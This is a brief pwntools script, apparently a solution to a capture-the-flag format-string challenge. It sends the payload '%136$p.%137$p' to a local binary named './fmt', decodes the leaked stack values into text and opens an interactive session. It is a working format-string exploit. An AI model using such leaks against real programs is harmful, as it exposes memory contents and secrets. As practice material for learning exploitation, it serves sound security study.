ctfs/random_challs/classic_fmtstring/a.py

#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./fmt", checksec=False)
r = process()

# funcs
s = lambda a: r.sendline(a)

# leak
s(b"%136$p.%137$p")
r.recvuntil(b"Here: ")
out = "".join([unhex(a[2:])[::-1].decode() for a in r.recvlineS().split(".")])
print(out)

r.interactive()